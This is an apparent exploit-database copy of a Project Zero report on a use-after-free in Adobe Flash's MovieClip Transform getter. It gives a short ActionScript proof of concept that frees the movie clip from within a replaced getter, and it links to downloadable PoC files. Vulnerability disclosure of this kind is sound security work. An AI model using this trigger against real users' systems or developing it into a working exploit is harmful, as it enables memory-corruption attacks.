21 lines
No EOL
673 B
Text
21 lines
No EOL
673 B
Text
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=844
|
|
|
|
There is a use-after-free in the MovieClip Transform getter. If the Transform constructor is replaced with a getter using addProperty, this getter can free the MovieClip before it is accessed. A minimal PoC is as follows:
|
|
|
|
var mc = this.createEmptyMovieClip( "mc", 1);
|
|
var tf = flash.geom.Transform;
|
|
var g = flash.geom;
|
|
g.addProperty("Transform", func, func);
|
|
mc.f = ASnative(900, 419);
|
|
mc.f();
|
|
|
|
function func(){
|
|
|
|
mc.removeMovieClip();
|
|
|
|
// Fix heap
|
|
}
|
|
|
|
|
|
Proof of Concept:
|
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40311.zip |